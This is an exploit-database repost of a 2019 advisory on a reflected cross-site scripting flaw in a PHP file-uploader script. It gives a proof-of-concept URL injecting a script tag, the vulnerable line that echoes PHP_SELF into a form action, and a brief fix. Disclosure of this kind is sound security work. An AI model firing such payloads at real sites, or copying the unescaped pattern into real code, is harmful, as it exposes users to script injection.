Advertisement






Shadow-Fox PhP Uploader Script Cross Site Scripting Vulnerability

CVE Category Price Severity
N/A CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2019-04-18
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019040172

Below is a copy:

Shadow-Fox PhP Uploader Script Cross Site Scripting Vulnerability
[+] Exploit Title ; Shadow-Fox PhP Uploader Script Cross Site Scripting Vulnerability

[+] Date : 2019-04-18

[+] Author : 0P3N3R FROM IRANIAN ETHICAL HACKERS

[+] Vendor Homepage : https://gist.github.com/shadow-fox/4017681

[+] Version : ...

[+] Dork : N/A

[+] My Site : ...

[+] Tested On : windows 10 - kali linux 2.0

[+] Contact : [email protected]

[+] Description :

[!] Free File Upload Script Based On PhP.

[+] Poc : 

[!] http://localhost/uploader.php/"><script>alert(1)</script>



[+] Security Level :

[!] Med

[+] Exploitation Technique:

[!] Remote

[+] Request Method :

[!] POST

[+] Vulnerability Link :

[*] http://localhost/uploader.php

[+] Vulnerable File (s) :

[!] uploader.php

[+] Vulnerable Source Codes :

[!] <form action="<?php echo $_SERVER["PHP_SELF"]; ?>" method="post" enctype="multipart/form-data">

[+] Fix :

[!] Restrict user input or replace bad characters


[+] We Are : [+] 0P3N3R [+] 

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.